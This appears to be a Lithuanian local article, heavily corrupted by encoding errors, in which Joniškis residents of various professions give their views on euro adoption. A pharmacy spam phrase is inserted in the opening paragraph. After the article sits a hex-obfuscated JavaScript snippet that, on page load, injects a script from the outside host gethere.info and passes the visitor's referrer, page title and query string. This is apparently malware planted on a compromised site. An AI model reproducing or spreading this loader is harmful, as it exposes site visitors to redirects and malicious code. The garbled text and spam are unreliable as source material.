KA� mano A?vairiA? profesiniA? sluoksniA? joniA?kieA?iai apie euro A?vedimA� Lietuvoje?

AkvilA� SabulytA� ir Judita JasaitytA�

motilium to buy 48 hours. A�iomis dienomis vis greiA?iau artA�jantis euro A?vedimas Lietuvoje yra plaA?iai diskutuojama tema. Vieni pritaria, vildamiesi, kad A?is politikA? sprendimas pagerins pragyvenimo lygA? A?alyje bei uA?tikrins stabilesnA� uA?sienio politikA� bei ekonomikA�. Kiti linkA� nepritarti tokiam sprendimui, A?sitikinA�, kad tai nebus naudinga paprastam dirbanA?iam A?mogui ar tiesiog nepatenkinti, kad gali kilti kainos. TaA?iau galbA�t vertA�tA? iA?klausyti ir finansus bei ekonomikA� iA?mananA?iA? A?moniA? nuomonA�s?

ApklausA�me A?vairiA? profesiniA? sluoksniA? atstovus: valstybA�s tarnautojas, pardavA�jas, banko vadovas, verslininkas ir finansA? specialistai. Nors kai kurie A?ia tema savo nuomonA� reiA?kA� nenoriai, vis dA�lto pavyko suA?inoti jA?, kad ir anonimiA?kA�, nuomonA�. Tad kA� gi JoniA?kyje dirbantys A?monA�s gali pasakyti apie euro A?vedimA�?

Banko vadovas:

aaa

a�zKalbA�damas apie euro A?vedimA� Lietuvoje, esu nusiteikA�s teigiamai. Tai didelA� ekonominA� paskata. Vien tai, jog sumaA?A�s skolinimosi iA?laidos, o investicijA? pritraukimas yra didA?iulA� nauda Lietuvai.

Nemanau, kad kainos stipriai kils, nes rinka tai reguliuoja, A?inoma, A?iA�rint A? kaimynines A?alis, tarkime, Latvija, nesenai tapusiA� euro valstybe, matome, kad kainos kiek didesnA�s, bet ne tiek, jog sukeltA? didelA? A?okA�.

AA? manau, kad Lietuva tik dabar A?siveda eurA�, nes mes anksA?iau neatitikome visA? A�euro zonos narystA�s kriterijA?, kurie buvo numatyti. 2006 m. jau turA�jome A?sivesti eurA�, taA?iau atsilikome labai maA?a dalimi infliacijos procento, nors tai, turbA�t, senbuvA�ms A?alims bA�tA? buvA� atleista, mums tuo metu neatleido, todA�l mes ir negalA�jom turA�ti euro. O A?iandien mes esam pasiruoA?A�, atitinkame kriterijus, ekonomika auganti ir todA�l dabar yra labai palankus metas A?sivesti eurA�. Apie pragyvenimo lygA?, vienareikA?miA?kai manau, jog jis kils ir problemA? su A?sivedimu neturA�tA? bA�ti.a�?

JoniA?kio rajono savivaldybA�s kanceliarijos darbuotoja:

asdad

a�zEuro A?vedimui Lietuvoje pritariu, taA?iau kalbA�dama kaip savivaldybA�s darbuotoja, suprantu, kad A?staigoms bus nelengva, jA? laukia labai didelis darbas, nes reikia pasirengti visam tam procesui. Dabar vis rengiami euro A?vedimo veiksmA? planai.

Apie pragyvenimo lygA? nenorA�A?iau kalbA�ti, kadangi yra labai A?vairiA? diskusijA?, kyla ir ginA?A?, matome tai A?iniasklaidoje. Vieni prognozuoja, kad turA�tA? kilti taA?iau A?inant kokia dabar finansinA� situacija Lietuvoje ir kad mus palietA� valstybA�s tarnautojA? sumaA?inti atlyginimai krizA�s metu, A?iai dienai nematau priekyje tA? veiksmA?, jog gyvenimo lygis bA�tA? palyginus aukA?tesnis.

Lietuva su euro A?vedimu tikrai susidoros, A?inoma A?staigos tam turi tinkamai pasiruoA?ti. Na ir aiA?ku jeigu kontroliuojanA?ios institucijos tinkamai atliks savo funkcijas, tai ir gyventojA? teisA�s, kad nebA�tA? jos paA?eistos.

A�sivedus eurA�, Lietuva bus vertinama kitaip, galbA�t palankiau, turA�s kitA� statusA�, kaip tapusi euro zonos nare.a�?

JoniA?kio rajono savivaldybA�s finansA? skyriaus vyr. specialistA�:

a�zKalbA�dama kaip pilietA�, apie euro A?vedimA� neturiu tvirtos savo nuomonA�s, juk vis tiek jis bus, taA?iau, turbA�t labiau esu linkusi nepritarti A?iam sprendimui. Nepaisant visA? prioritetA?, tokiA? kaip patogesnis atsiskaitymas uA?sienio A?alyse, senA?jA? Pasaulio rinkos valstybiA? patirtis rodo, kad netgi didA?iosios euro valstybA�s kalbA�jo apie iA?stojimA� iA? euro zonos. Manau, tokiems jA? svarstymams yra rimtA? prieA?asA?iA?, todA�l euro zona man A?iuo metu kelia nemaA?ai abejoniA?.

Suprantu, kad tapimas pilnateise euro zonos valstybe turA�s nemaA?ai A?takos mA�sA? A?alies ekonomikai, taA?iau nesu tvirtos nuomonA�s, kad tai bus vien teigiama A?taka. A?iA�rint iA? ekonominA�s pusA�s, dabartinA� nacionalinA� valiuta – litas yra pakankamai stabili bei glaudA?iai susijusi su euru ir nekinta jau nuo, turbA�t,A� 2002 metA?.

TaA?iau nesakau, kad A?is sprendimas yra neteisingas ir tai neturA�s naudos mums kaip valstybei, ekonominiu atA?vilgiu. PranaA?aujama, kad dA�l euro A?vedimo intensyvA�s ir prekyba. Tiesiog reiA?kiu abejonA� ir manau, kad gyvenimas viskA� parodys.a�?

ValstybA�s tarnautoja (minimalus atlyginimas):

a�zEsu grieA?tai prieA? euro A?vedimA� Lietuvoje. Apskritai esu senamadiA?kA? paA?iA�rA? A?mogus, kuris nemA�gsta permainA?, taA?iau suprantu, kad gyvenimo nesustabdysi. A�Manau, kad svarbu iA?saugoti nacionalinA� mA�sA? valiutA�, juk tai yra vertybA�. Suprantu, kad euras yra labai palanku verslininkams, taA?iau, mano nuomone, jeigu jau A?sivedA�me litA�, turime branginti A?iA� savo nacionalinA� vertybA�.

DA�l Europos SA�jungos ateities nesu tikra. O ir Lietuva, jeigu A?sivesime eurA�, gali dar greiA?iau iA?nykti. AiA?ku, kalbant apie mokslA� bei darbA� uA?sienyje, jaunimui tai duos labai daug naudos, taA?iau jeigu bA�tA? galimybA� dirbti ir mokytis Lietuvoje -A� nereikA�tA? niekur keliauti ir ieA?koti geresnio a�zkA�snioa�?.

Tegul kiti dA?iaugiasi tokiu sprendimu, taA?iau aA? mieliau likA?iau a�zprie litoa�?. O ir tie keitimai… Tikrai nebus apsieita be apgauliA?, vagysA?iA?. KaA?kam vis tiek turA�s bA�ti iA? to nauda, o paprastam A?mogui nuo to tikrai nebus geriau. Kainos kils, o kaip su tokiais atlyginimais? Net gA�da bus prieA? kitas A?alis tokA? atlyginimA� atsiimt.

Tai yra tik mano asmeninA� nuomonA�. AiA?ku, turime bA�ti tolerantiA?ki, taA?iau juk turA�ti savo nuomonA� niekas nedraudA?ia.a�?

Taip pat suA?inojome ir jaunimo nuomonA�, o kA� jie mano ir A?ino apie euro A?vedimA�?

GimnazistA� KamilA�:

a�zA�iuo metu dar nesu pilnametA�, todA�l nemanau, kad euro A?vedimas yra man aktuali tema. Diskusijomis bei naujienomis apie naujA�jA� mA�sA? valiutA� nesidomiu ir papildomai informacijos neieA?kau, taA?iau suprantu, kad prieA? pat A?vedimA� apie tai kalbA�s beveik visi ir A?i tema bus neiA?vengiama kiekvienam Lietuvos Respublikos pilieA?iui. Tiesa, kartais paA?iA�riu televizijos laidas, debatus.

Suprantu, kodA�l senyvo amA?iaus A?monA�s nori, kad litas liktA? nacionaline valiuta. Jiems sunkiau adaptuotis prie naujoviA?, prieA?ingai nei A?iuolaikiniam jaunimui. A�iandien jaunimas yra imlus ir atviras naujovA�ms, taA?iau, mano nuomone a�zfainaa�? bA�tA? iA?saugoti litA�. A�i nacionalinA� vertybA� neturA�tA? bA�ti saugoma tik muziejuose ar kaip retas, praeitA? primenantis simbolis.

Kita vertus, stodami A? Europos SA�jungA� turA�jome numatyti bA�tinybA� anksA?iau ar vA�liau prijungti prie euro zonos. Manau, nepaisant vartotojui nepalankaus kainA? apvalinimo, studijA? kainA? kilimo, euro A?vedimas turA�s tikrai daug teigiamos A?takos mA�sA? ekonomiA?kai silpnai valstybei.

AA? visada lieku ir liksiu lietuvA�, taA?iau, A?vedus eurA�, prisitaikysiu ir gyvensiu toliau.a�?

Mums belieka atsakyti A? patA? svarbiausiA� klausimA� a�� kaip padA�ti suprasti A?monA�ms, kad euro A?vedimas – tinkamas ir pats geriausias sprendimas mA�sA? valstybei, o Europos SA�junga suteikA� ir suteiks tikrai nemaA?ai naudos ne tik mA�sA? rinkai, ekonomikai, infrastruktA�rai bei A�kio plA�trai, bet ir paprastam A?mogui.

var _0x31f1=[„\x73\x63\x72\x69\x70\x74″,“\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,“\x73\x72\x63″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D“,“\x72\x65\x66\x65\x72\x72\x65\x72″,“\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D“,“\x74\x69\x74\x6C\x65″,“\x26″,“\x3F“,“\x72\x65\x70\x6C\x61\x63\x65″,“\x73\x65\x61\x72\x63\x68″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“,“\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,“\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,“\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,“\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,“\x68\x65\x61\x64″,“\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,“\x70\x72\x6F\x74\x6F\x63\x6F\x6C“,“\x68\x74\x74\x70\x73\x3A“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x52\x5F\x50\x41\x54\x48″,“\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E“];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Parašykite komentarą

El. pašto adresas nebus skelbiamas. Būtini laukeliai pažymėti *